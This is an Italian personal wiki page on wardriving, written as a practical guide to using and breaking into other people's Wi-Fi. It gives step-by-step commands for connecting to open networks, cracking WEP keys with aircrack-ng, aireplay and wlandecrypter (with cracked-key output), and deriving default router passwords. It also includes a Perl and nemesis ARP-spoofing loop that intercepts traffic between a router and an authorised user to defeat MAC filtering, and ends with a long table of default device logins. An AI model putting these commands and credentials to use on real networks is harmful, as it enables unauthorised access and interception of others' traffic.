Wardriving
From Alessandro's Wiki
Chi è un Wardriver?
- Wardriver è quell'uomo che se ne va ingiro, portatile alla mano a cercare connessioni wireless e ne traccia una mappa. Non importa l'uso che ne fa, se ci navigherà sarà un wardriver buono se attaccherà, decripterà o ingannerà la rete trovata, sarà + un hacker che un wardriver.
- Io consiglio di utilizzare un pc con linux e una scheda 802.11x con chip Atheros (madwifi). Solitamente D-Link Xtreme.
Scroccare internet
- una volta configurata la scheda, come ath0 (o eth1 eth7, wlan0 ecc. dipende dalla scheda e dalla distrib.)
siamo pronti per dare un'occhiata e wardriverare.
- diciamo alla scheda di agganciarsi a qualsiasi rete, qualsiasi canale.
iwconfig ath0 essid any channel 0
- scanniamo l'aria...
iwlist ath0 scanning
appariranno tutte le reti disponibili, ora bisogna scegliere la rete
- Prendiamo come esempio la rete wireless
iwconfig ath0 essid wireless
- se siamo connessi alla rete, vedremo il BSSID dell'acces point.
iwconfig ath0 ifconfig ath0 up
- la rete adesso è su , ma manca il livello IP, le opzioni sono 2
- chiedere un ip all'accespoint
dhclient ath0
- oppure scegliere delle reti a caso, partenda dalla + probabile:
ifconfig ath0 192.168.1.166
- oppure
ifconfig ath0 192.168.0.166
- oppure
ifconfig ath0 192.168.100.166
- oppure
ifconfig ath0 172.16.0.166
- oppure
ifconfig ath0 10.1.1.166
- una volta trovata la rete proviamo a fare u nping al router/access point
ping 192.168.1.1
- se ci ponga al ping, siamo connessi ed è probabile che riusciremo anche a navigare
- se non pinga, i motivi possono essere un numero molto alto
- Il router ha un firewall che blocca il ping
- il router ha impostata la sicurezza a livello MAC, una lista di schede di rete accettabili, e il blocco di tutte le schede non conosciute --> vedi + in basso:
- il router ha una WEP/WPA, password di protezione.
- mentre facevamo il comando di ping, il router si è misteriosamente spento, oppure si è persa la connessione per qualche fattore ambientale, hanno chiuso una finestra (di quelle vere) o qualcuno si è messo tra noi e l'antenna.
- non abbiamo azzeccato l'ip del router (di solito è il .1 di una rete, di solito..)
- la scheda non funziona
- la spina è attaccata?
- ecc..
Trovare reti all'infinito
- se hai un'antenna con cavo e vuoi provare a muoverla per migliorare la ricezione, il comando watch fa comodo.
#!/bin/sh iwconfig ath0 essid any watch 'iwlist ath0 scanning |grep -2 Channel'
Niente Paura della WEP
Aircrack
WLAN_39-1.cap è il file dove ho catturato i pacchetti
aircrack-ng -a1 -eWLAN_39 -b00:60:B3:FD:70:57 -m00:0E:35:07:38:B7 -s WLAN_39-1.cap
aircrack-ng -a 1 -m 00:16:0A:06:8B:B3 -b 00:16:0A:06:2A:9C -e "Sweex LW050" -s dump-w-1-ch-6-02.cap
Aircrack-ng 1.0
[00:00:17] Tested 13626 keys (got 904240 IVs)
KB depth byte(vote) 0 0/ 1 6E(1259008) F8(943360) 0A(937216) 99(935936) 89(935680) A0(934400) 38(932608) 78(932608) 73(930816) 1 0/ 1 69(1231616) 61(944640) 06(941824) C4(941312) 42(940544) 95(935936) 21(935424) E3(933632) 32(932352) 2 0/ 1 63(1238016) E6(945920) E7(944640) 4E(936192) D9(932608) 27(932352) 3E(932096) 93(931072) EE(931072) 3 0/ 1 6F(1248256) 63(938496) 6A(936704) 4D(936448) 92(934400) 60(932352) 25(931584) 6B(929792) E8(927488) 4 0/ 1 31(1227264) B4(947200) DF(943616) 7C(938752) 7B(934656) 30(931328) D9(929792) E5(929536) 0B(928256) 5 0/ 1 33(1232896) 7C(950528) 50(946688) 36(941824) E2(941568) 3F(938240) 89(937472) C1(933632) 68(933376) 6 0/ 1 35(1192192) 72(946944) FD(944128) CA(939776) 6B(938240) 81(935936) 97(933632) 4B(933376) 6D(932608) 7 0/ 1 38(1197824) EA(941312) C7(938240) 2A(935424) B4(934400) 85(932864) 79(930048) 4F(929536) F1(928512) 8 0/ 1 32(1180672) 43(946432) DF(940544) 2B(935680) 4D(934912) 1C(934144) 7A(933888) FB(933376) 98(931840) 9 0/ 1 33(1200128) A0(950016) 39(939520) C9(939264) B4(937984) 59(934912) 66(933376) 0A(932608) EE(932608) 10 0/ 1 7A(961024) 35(941824) 8F(941312) 06(938752) A7(935424) 23(934656) 08(933632) C3(933632) 24(933376) 11 3/ 1 AF(938496) 82(935936) 9C(934912) B1(934400) 11(932864) 1D(932608) 1B(931840) FC(931840) 40(930304) 12 0/ 1 34(1059824) 15(947576) 63(937100) EF(931872) 7D(930464) CE(929532) EC(928572) 9E(927728) D8(927612)
KEY FOUND! [ 6E:69:63:6F:31:33:35:38:32:33:35:38:34 ] (ASCII: nico135823584 ) Decrypted correctly: 100%
WPA
http://docs.alkaloid.net/index.php/Cracking_WEP_and_WPA_Wireless_Networks#WPA_Crackin
Generare traffico
- con aireplay si fa così:
aireplay ath0 -3 -b 00:11:95:9D:74:1C -h 00:90:96:65:E5:47 -a 00:11:95:9D:74:1C -e ADSL-WIRELESS
- Nel frattempo catturiamo con airodump:
airodump ath0 WLAN_11-1 6
L'output + o meno sarà:
BSSID PWR Beacons IP / # Data CH MB ENC ESSID 00:11:95:9D:74:1C 10 8595 101469 6 54 WEP ADSL-WIRELESS BSSID STATION PWR Packets ESSID 00:11:95:9D:74:1C 00:90:96:65:E5:47 -2 56435 ADSL-WIRELESS
AccessPoints WLAN_XX
- Ho ricevuto un router dalla mia compagnia telefonica con una wep impostata, ma ho perso il foglietto con la chiave... la troverò usando un programma chiamato wlandecrypter usato assieme a wepattack. Servirà anche airodump.
- vediamo che canale, che essid e che bssid (AP MAC) ha:
iwlist ath0 scan
- Catturo i pacchetti: (airodump "interfaccia_wifi" "output_file" "channel")
airodump ath0 WLAN_12 6
- aspetto fino a che non cominciano ad entrare pacchetti di dati ("Data"), poi quando cominciano a essere almeno una decina o un centinaio, premo Control-C per interrompere.
- adesso passo il file .cap che ha generato airodump e lo passo a wepcrack(airodump genera 2 file, un .cap con i pacchetti e un .txt con le informazioni sugli host e gli AP) wlandecrypter bssid essid | wepattack -f output_name.cap
wlandecrypter 00:60:B3:XX:70:XX WLAN_12 | wepattack -f WLAN_12.cap
- L'output sarà + o meno questo:
wlandecrypter 0.4 - (c) 2006 nilp0inter2k6_at_gmail.com ------------> http://www.rusoblanco.com <------------
[+] BSSID: 00:60:B3:77:77:77 [+] Modelo: Z-com [+] ESSID: WLAN_39 [+] Seleccionada salida estandar Extraction of necessary data was successfull! Founded BSSID: 1) 00 60 B3 FD 70 77 / Key 0 1 network loaded... Accepting wordlist data... key no. 10000: Z001349270F39 key no. 20000: Z0013494E1F39 key no. 30000: Z001349752F39 ++++++++++ Packet decrypted! ++++++++++ BSSID: 00 60 B3 44 44 44 / Key 0 WepKey: 5A 30 30 31 33 34 39 37 42 30 32 33 39 (Z0013497B0239) Encryption: 128 Bit time: 11.580097 sec words: 31492
Access Points SpeedTouccXXXXX / ThomsonXXXX
The default password is generated by an algorithm so, with a simple "while" you can get the password from the mac address and the ESSID , there is a software to do that or a website.
http://www.nickkusters.com/SpeedTouch.aspx
Filtraggio di MAC
- Questo sistema di protezione ha senso ma non troppo perché l'indirizzo univoco della scheda wifi può essere falsificato, per esempio si potrebbe copiare quello che usa l'utente della rete e farsi scambiare per amico dall'accespoint. Ecco come si fa:
- è necessario avere perl
- è necessario il programma nemesis
- anche uno sniffer serve, come tcpdump o meglio (+ visuale) ethereal e ethereal-gnome come interfaccia.
- sarà molto utile la tabella a pié di pagina, sulle password di fabbrica dei router e/o access points.
- immaginazione.
Trovare un indirizzo mac autorizzato:
- connettiamoci alla rete, anche se non riceviamo e non possiamo inviare pacchetti, basta che la scheda sia associata all'acces point (si vede il BSSID da iwconfig che è tipo un xx:xx:xx:xx:xx:xx....)
- apriamo il nostro sniffer, e cominciamo ad annotarci tutti gli indirizzi MAC che vediamo. Escludiamo quello della nostra scheda,
tcpdump -i ath0 -n -e -q ether host 00:01:38:4D:83:E9
- questo comando comincerà a stampare linee tate quanti pacchetti passano per l'interfaccia ath0 e che abbiano il mac address del mittente o ricevente = a "00:01:38:4d:83:e9"
14:49:26.143433 00:01:38:4d:83:e9 > 00:13:8f:a3:0c:07, IPv4, length 60: 212.35.207.11.80 > 192.168.1.82.36491: tcp 0 14:49:26.296083 00:01:38:4d:83:e9 > 00:13:8f:a3:0c:07, IPv4, length 379: 207.46.109.59.1863 > 192.168.1.82.45046: tcp 313 14:49:26.296126 00:13:8f:a3:0c:07 > 00:01:38:4d:83:e9, IPv4, length 66: 192.168.1.82.45046 > 207.46.109.59.1863: tcp 0
- vediamo che 00:01:38:4d:83:e9 comunica con 00:13:8f:a3:0c:07, quindi se questo non è il MAC della nostra scheda, possiamo prendelo come documento falso da usare con il router, con nemesis:
- MAC mia scheda 00:01:29:25:27:0e
- MAC router 00:01:38:4d:83:e9 -> IP 192.168.1.1
- MAC utente autorizzato router: 00:13:8f:a3:0c:07 -> IP 192.168.1.200
- ora bisogna creare un triango, ossia far credere al router che l'utente siamo noi e contemporaneamente all'utente che il router siamo noi. Questo è possibile generando un pacchetto che dica: 'sono il router e ho questo MAC(il nostro)' all'utente e 'sono l'utente e ho questo MAC(il nostro)' al router.
- parliamo con il router:
perl -e 'while(1){print "Deviando..\n"; system(" \ nemesis arp -v -r -d ath0 \ -S 192.168.1.200 -D 192.168.1.1 \ -h 00:01:29:25:27:0e -m 00:0B:6A:76:97:AF \ -H 00:00:61:74:68:30 -M 00:0B:6A:76:97:AF \ "); sleep 10; }'
- parliamo con l'utente:
perl -e 'while(1){print "Deviando..\n"; system(" \ nemesis arp -v -r -d ath0 \ -S 192.168.1.1 -D 192.168.1.200 \ -h 00:01:29:25:27:0e -m 00:13:8f:a3:0c:07 \ -H 00:01:29:25:27:0e -M 00:01:38:4d:83:e9 \ "); sleep 10; }'
- Questi comandi loopperanno all'infinito, vanno eseguiti in 2 terminali diversi oppure appiccicarli in una chiamata unica di perl, e il risultato sarà che tutto il traffico tra router e utente passerà per la nostra scheda. Così facendo possiamo preovare ad entrare nel router e aggiungere il nostro mac alla lista di "amici".
Defaults WEP Keys
- CIFRADO 64BITS:
FFFFFFFFFF 0000000000 0101010101 0202020202 0303030303 0404040404
- Netgear
Default WEP KEY1: 11 11 11 11 11 Default WEP KEY2: 20 21 22 23 24 Default WEP KEY3: 30 31 32 33 34 Default WEP KEY4: 40 41 42 43 44
- CIFRADO 128BITS:
FFFFFFFFFFFFFFFFFFFFFFFFFF 00000000000000000000000000 01010101010101010101010101
- Zyxel
64-bit WEP with 5 characters Key1= 2e3f4 Key2= 5y7js Key3= 24fg7 Key4= 98jui
- 64-bit WEP with 10 hexadecimal digits
('0-9', 'A-F') Key1= 0x123456789A Key2= 0x23456789AB Key3= 0x3456789ABC Key4= 0x456789ABCD
- 128-bit WEP with 13 characters
Key1= 2e3f4w345ytre Key2= 5y7jse8r4i038 Key3= 24fg70okx3fr7 Key4= 98jui2wss35u4
- 128-bit WEP with 26 hexadecimal digits
('0-9', 'A-F') Key1= 0x112233445566778899AABBCDEF Key2= 0x2233445566778899AABBCCDDEE Key3= 0x3344556677889900AABBCCDDFF Key4= 0x44556677889900AABBCCDDEEFF
Default Passwords by Manufacturer
MFabbricante Modello OS Versione Login Password
3Com - 1.25 root letmein 3Com Super Stack 2 Switch Any manager manager 3Com AccessBuilder® 7000 BRI Any - - 3Com CoreBuilder 2500 - - - 3Com Switch 3000/3300 - manager manager 3Com Switch 3000/3300 - admin admin 3Com Switch 3000/3300 - security security 3com Cable Managment System SQL Database (DOSCIC DHCP) Win2000 & MS DOCSIS_APP 3com 3Com NAC (Network Access Card) - adm none 3Com HiPer ARC Card v4.1.x of HA adm none 3Com CoreBuilder 6000 - debug tech 3Com CoreBuilder 7000 - tech tech 3Com SuperStack II Switch 2200 - debug synnet 3Com SuperStack II Switch 2700 - tech tech 3Com SuperStack / CoreBuilder - admin - 3Com SuperStack / CoreBuilder - read - 3Com SuperStack / CoreBuilder - write - 3Com LinkSwitch and CellPlex - tech tech 3Com LinkSwitch and CellPlex - debug synnet 3com Superstack II 3300FX - admin - 3com Switch 3000/3300 - Admin 3com 3com 3comCellPlex7000 - tech tech 3Com Switch 3000/3300 - monitor monitor 3Com AirConnect Access Point n/a - comcomcom 3com Superstack II Dual Speed 500 - security security 3Com OfficeConnect 5x1 at least 5.x - PASSWORD 3Com SuperStack 3 Switch 3300XM - admin - 3com Super Stack 2 Switch Any manager manager 3Com SuperStack II Switch 1100 - manager manager 3Com SuperStack II Switch 1100 - security security 3com super stack 2 switch any manager manager 3Com Office Connect Remote 812 - root !root 3Com Switch 3000/3300 - admin admin 3COM OCR-812 - - - 3com - - - - 3com NBX100 2.8 administrator 0000 3com Home Connect - User Password 3Com OfficeConnect 5x1 at least 5.x estheralastruey - 3Com SuperStack II Switch 3300 - manager manager 3Com Superstack - - - ACC Routers - netman netman Acc/Newbridge Congo/Amazon/Tigris All versions netman netman Acc/Newbridge Congo/Amazon/Tigris All versions netman netman adaptec - - - - Adaptec RAID Storage Manager Pro All Administrator adaptec adtran tsu 600 ethernet module - 18364 - Adtran TSU 120 e - - ADTRAN Adtran TSU 120 e - - ADTRAN Aironet All - alcatel - - - - Alcatel 1000 ANT Win98 - - alcatel speed touch home - - - Alcatel/Newbridge/Timestep VPN Gateway 15xx/45xx/7xxx Any root permit Alcatel/Newbridge/Timestep VPN Gateway 15xx/ Any root permit Alcatel/Newbridge/Timestep VPN Gateway 15xx/ Any root permit Allied Tenysin R130 - Manager friend Alteon ACEswitch 180e (telnet) - admin blank Alteon Web Systems All hardware releases Web OS 5.2 none admin APC MasterSwitches - apc apc APC Any Firmware Pri apcuser apc Apple Network Assistant 3.X None xyzzy Apple Airport 1.1 none public Arrowpoint any? - admin system Ascend All TAOS models all admin Ascend Ascend Pipeline Terminal Server - answer - Ascom Timeplex Routers Any See notes - AT&T Starlan SmartHUB 9.9 N/A manager AWARD Any BIOS - AWARD_SW - Axent NetProwler manager WinNT administrator admin Axis NPS 530 5.02 root pass AXIS StorPoint CD100 4.28 root pass AXIS 200 V1.32 - admin - Axis 2100 Network Camera Linux (ETRAX root pass bay cv1001003 - - - bay - - - - Bay - - - - Bay / Nortel ARN 13.20 Manager (caps count !) - Bay Network Routers All - User - Bay Networks ASN / ARN Routers Any Manager Manager Bay Networks Baystack - - NetICs Bay/Nortel Networks Accelar 1xxx switches Any rwa rwa Bay/Nortel Networks Remote Annex 2000 Any admin IP address BEA Weblogic 5.1 system weblogic BEA - - - - bewan - - - - Bintec all Routers Any admin bintec Bintec - - - - Biodata BIGfire & BIGfire+ all - biodata Biodata all Babylon-Boxes all - Babylon Borland interbase - - - Borland Interbase Any politcally correct Borland/Inprise Interbase any SYSDBA masterkey BreezeCom AP10, SA10 BreezeNET PR - - BreezeCOM Station Adapter and Access Point 4.x - Super BreezeCOM - 3.x - Master BreezeCOM Station Adapter and Access Point 2.x - laflaf Brocade Silkworm - admin password Buffalo/MELCO AirStation WLA-L11 - root (cannot be changed) (no password by default) Cabletron any any -- -- Cabletron NB Series Any - inuvik49 Cabletron routers and switches * * blank blank Cayman 3220-H DSL Router GatorSurf 5. Any - celerity - - - - Chase Research Iolan+ - - iolan Cisco Any Router and Switch 10 thru 12 cisco cisco Cisco ConfigMaker Software any? n/a cmaker CISCO Network Registrar 3.0 ADMIN changeme CISCO N/A N/A pixadmin pixadmin Cisco routers Not sure...j - san-fran Cisco VPN 3000 Concentrator - admin admin Cisco Net Ranger 2.2.1 Sol 5.6 root attack cisco 1600 12.05 - - cisco 1601 - - - cisco - - - - cisco - - - - Cisco MGX * superuser superuser cisco 1601 - - - cisco - - - - Cisco - - - - cisco - - - - Cisco any aany IOS no default login no default password CISCO arrowpoint - - - cisco - - - - cisco - - - - cisco - - - - Cisco 2503 - - - Cisco - - - - cisco - - - - Cisco IDS (netranger) - root attack cisco - - - - cisco 1600 - - - CMOS BIOS - - - ESSEX or IPC Cobalt RaQ * Qube* Any admin admin Com21 - - - - Comersus Shopping Cart 3.2 Win 95/98/NT admin dmr99 Compaq Insight Manager - Administrator administrator Compaq Insight Manager - operator operator Compaq Management Agents All administrator none compaq - - - - copper mountain - - - - Coppercom - - - - Coyote-Point Equaliser 4 Free BSD eqadmin - Serial port only equalizer Coyote-Point Equaliser 4 Free BSD root - Serial port only - Coyote-Point Equaliser 4 Free BSD look - Web Browser only (Read a look Coyote-Point Equaliser 4 Free BSD touch - Web Browser only (Write touch Cyclades MP/RT - super surt D-Link DI-704 - - admin D-Link DI-701 2.22 (?) - - Dell PowerVault 50F WindRiver (E root calvin Dell PowerVault 35F - root calvin Dell Powerapp Web 100 Linux RedHat 6.2 root powerapp dell - - - - Digiboard Portserver 8 & 16 any root dbps DLink DI-206 ISDN router 1.* Admin Admin Dlink Dl-106 ISDN router - - 1234 DLink DL-701 Cable/DSL Gateway/Firewall - - year2000 Dlink DFE-538TX 10/100 Adapter Windows 98 - - dlink di704 - - admin DLink DI 106 winnt administrator @*nigU^D.ha,; Dupont Digital Water Proofer Sun Sparc any root par0t eci - - - - Efficient - - - - Elron Firewall 2.5c hostname/ip address sysadmin emai hotmail - - - Ericsson ACC - netman netman Ericsson (formerly ACC) Any router all netman netman Extended Systems ExtendNet 4000 / Firewall all Versions admin admin Extended Systems Print Servers - admin extendnet Extreme All Summits - admin - extreme black diamond - - - Extreme All All Admin - Flowpoint 144, 2200 DSL Routers ALL - password FlowPoint 144, 2200 DSL Routers ALL - admin Flowpoint 2200 - - Serial Num Flowpoint 2200 - - Serial Num fore - - - - Fore Systems ASX 1000/1200 6.x ami - Foundry Networks ServerIronXL Any - - fujitsu l460 - - - Future Networks FN 110C Docsis cablemodem Any - - gatway solo9100 win95 - - General Instruments SB2100D Cable Modem - test test gonet - - fast abd234 Hewlett Packard HP Jetdirect (All Models) Any none none Hewlett Packard MPE-XL - HELLO MANAGER.SYS Hewlett Packard MPE-XL - HELLO MGR.SYS Hewlett Packard MPE-XL - HELLO FIELD.SUPPORT Hewlett Packard MPE-XL - MGR CAROLIAN Hewlett Packard MPE-XL - MGR CCC Hewlett Packard MPE-XL - OPERATOR COGNOS Hewlett Packard MPE-XL - MANAGER HPOFFICE hp 4150 - - - hp - - - - IBM AS/400 - qsecofr qsecofr IBM AS/400 - qsysopr qsysopr IBM AS/400 - qpgmr qpgmr IBM NetCommerce PRO 3.2 ncadmin ncadmin IBM LAN Server / OS/2 2.1, 3.0, 4. username password IBM 2210 RIP def trade IBM DB2 WinNT db2admin db2admin IBM Lotus Domino Go WebServer (net.commerce edition) ANY ? webadmin webibm IBM AS400 Any QSECOFR QSECOFR IBM RS/6000 AIX root ibm IBM - OS/400 QSECOFR QSECOFR IBM AS400 - QSRVBAS QSRVBAS IBM AS400 - QSRV QSRV ibm as400 - - - IBM AS/400 OS/400 QUSER QUSER IBM AS/400 - - - IBM ra6000 AIX Unix - - IBM AIX - - - Imperia Software Imperia Content Managment System Unix/NT superuser superuser Intel 510T Any - admin Intel All Routers All Versions - babbit Intel All Routers All Versions - babbit Intel Intel PRO/Wireless 2011 Wireless LAN Access Point Any - Intel Intel wireless lan access Point - - comcomcom Ipswitch Whats up Gold 6.0 Windows 9x a admin admin janta sales 254 compaq janta sales janta211 janta sales 254 compaq janta sales janta211 Jetform Jetform_design - Jetform - Kawa - - - - LANCAST - - - - Lantronix LPS1-T Print Server j11-16 any system Lantronix MSS100, MSSVIA, UDS10 Any - system Lantronix LSB4 any any system Lantronix Printer and terminalservers - - system LGIC Goldstream 2.5.1 LR-ISDN LR-ISDN Linkou School - - bill bill Linkou School - - bill bill Linksys Cable/DSL router Any - admin Linksys BEFSR7(1) OR (4) Standalone R blank admin linksys - - - - Linksys BEFSR41 - (blank) admin Livingston Livingston_portmaster2/3 - !root blank Livingston Livingston_officerouter - !root blank Lucent Portmaster 2 - !root none Lucent Cajun Family - root root lucent Portmaster 3 unknown !root !ishtar Lucent Packetstar (PSAX) - readwrite lucenttech1 Lucent AP-1000 - public public lucent dsl - - - lucent - - - - macromedia freehand 9 - - MacSense X-Router Pro - admin admin mcafee - - - - microcom hdms unknowen system hdms Micron - bios - - Microrouter (Cisco) Any Any - letmein Microrouter (Cisco) Any Any - letmein Microsoft Windows NT All Administrator - Microsoft Windows NT All Guest - Microsoft Windows NT All Mail - Microsoft SQL Server - sa - Microsoft Windows NT 4.0 pkoolt pkooltPS Microsoft NT - - start MICROSOFT NT 4.0 free user user Microsoft Windows NT 4.0 admin admin MICROSOFT NT 4.0 free user user Microsoft - - - - microsoft - - - - Microsoft Ms proxy 2.0 - - - microsoft - - - - mICROSOFT - - - - Microsoft Key Managment Server Windows NT 4 - password Microsoft - - - - Motorola Motorola-Cablerouter - cablecom router Motorola Motorola-Cablerouter - cablecom router motorola cyber surfer - - - msdloto msdloto - - - msdloto - - - - Multi-Tech RASExpress Server 5.30a guest none Nanoteq NetSeq firewall * admin NetSeq NetApp NetCache any admin NetCache Netgaer RH328 - - 1234 Netgear RH348 - - 1234 Netgear ISDN-Router RH348 - - 1234 Netgear RT311 Any Admin 1234 Netgear RT314 Any Admin 1234 Netgear RT338 - - 1234 Netgear RT311/RT314 - admin 1234 netgear - - - - netlink rt314 - - - Netopia R7100 4.6.2 admin admin Netopia 455 v3.1 Netscreen NS-5, NS10, NS-100 2.0 netscreen netscreen NeXT - NeXTStep 3.3 me - Nokia - Telecom NZ M10 - Telecom Telecom Nortel Meridian 1 PBX OS Release 2 0000 0000 Nortel Contivity Extranet Switches 2.x admin setup Nortel Norstar Modular ICS Any **ADMIN (**23646) ADMIN (23646) Nortel Norstar Modular ICS Any **CONFIG (266344) CONFIG (266344) Nortel Networks (Bay) Instant Internet Any - - Northern Telecom(Nortel) Meridian 1 - - m1link Novell NetWare Any guest - Novell NetWare any PRINT - Novell NetWare Any LASER - Novell NetWare Any HPLASER - Novell NetWare Any PRINTER - Novell NetWare Any LASERWRITER - Novell NetWare Any POST - Novell NetWare Any MAIL - Novell NetWare Any GATEWAY - Novell NetWare Any GATE - Novell NetWare Any ROUTER - Novell NetWare Any BACKUP - Novell NetWare Arcserve CHEY_ARCHSVR WONDERLAND Novell NetWare Any WINDOWS_PASSTHRU - novell - - - - ODS 1094 IS Chassis 4.x ods ods Optivision Nac 3000 & 4000 any root mpegvideo Oracle 8i 8.1.6 sys change_on_install Oracle Internet Directory Service any cn=orcladmin welcome Oracle 7 or later - system manager Oracle 7 or later - sys change_on_install Oracle 7 or later Any Scott Tiger Oracle 8i all internal oracle oracle - - - - oracle - - - - oracle co. Database engines every sys change_on_install Osicom(Datacom) Osicom(Datacom) - sysadm sysadm Pandatel EMUX all admin admin PlainTree Waveswitch 100 - - default.password RapidStream RS4000-RS8000 Linux rsadmin rsadmin realtek 8139 - - - Remedy Any Any Demo - Research Machines Classroom Assistant Windows 95 manager changeme Rodopi Rodopi billing software 'AbacBill' sql database - rodopi rodopi Samba SWAT Package Linux Any Local User Local User password schoolgirl member - ich hci Securicor3NET Monet any manager friend Securicor3NET Cezzanne any manager friend SGI all all root n/a SGI Embedded Support Partner IRIX 6.5.6 Administrator Partner SGI IRIX ALL lp lp SGI IRIX ALL OutOfBox, demos, guest, 4DGifts (none by default) SGI IRIX ALL EZsetup - Shiva LanRover any? root - Shiva AccessPort Any hello hello Shiva Any? - Guest blank SMC Barricade - - admin soho nbg800 unknown admin 1234 Solaris - - - - sonic wall any firewall device admin password - SonicWall Any Firewall Device - admin password SpeedStream - - - - Spider Systems M250 / M250L - - hello Sprint PCS SCH2000 see notes Menu - 8 - 0 (see notes) 040793 Ssangyoung SR2501 - - 2501 Sun - SunOS 4.1.4 root - Sun - Solaris - - surecom ep3501/3506 own os admin surecom Symnatec - - - - SysKonnect 6616 - default.password - SysKonnect 6616 - default.password - Tekelec Eagle STP - eagle eagle Telebit netblazer 3.* - setup/snmp setup/nopasswd Terayon TeraLink Getaway - admin password Terayon TeraLink 1000 Controller - admin password Terayon TeraLink 1000 Controller - user password Terayon TeraLink Getaway - user password terayon - 6.29 admin nms Terrayon - - - - Titbas - SCO haasadm lucy99 TopLayer AppSwitch 2500 Any siteadmin toplayer Toshiba TR-650 V2.01.00 admin tr650 toshiba 480cdt - - - toshiba - - - - TrendMicro ISVW (VirusWall) any admin admin Trintech eAcquirer App/Data Servers - t3admin Trintech Ullu ka pattha Gand mara Gandoo Bhosda Lund USR TOTALswitch Any none amber Vina Technologies ConnectReach 3.6.2 (none) (none) voy - - - - WatchGuard FireBox 3-4.6 - wg (touch password) Webmin Webmin Any Unix/Lin admin - Webramp 410i etc... - wradmin trancell Win2000 Quick Time 4.0 Englisch - - Windows 98 se 98 se - - - Wireless Inc. WaveNet 2458 n/a root rootpass Xylan Omnistack 1032CF 3.2.8 admin password Xylan Omnistack 4024 3.4.9 admin password Xylan Omniswitch 3.1.8 admin switch xyplex mx-16xx - setpriv system Zyxel ISDN-Router Prestige 1000 - - 1234 zyxel prestige 300 series zynos 2.* - 1234 Zyxel ISDN Router Prestige 100IH - - 1234 Zyxel prestige 300 series any - - Zyxel prestige 600 series any - - ZYXEL 641 ADSL - - 1234 Zyxel prestige 128 modem-router any - 1234 Zyxel ISDN-Router Prestige 1000 - - - Zyxel ISDN-Router Prestige 1000 - - -
Spero siano utili a qualcuno
LOG
Nov/02/2006 15:38:05 Wireless PC connected 00-11-24-22-A9-AE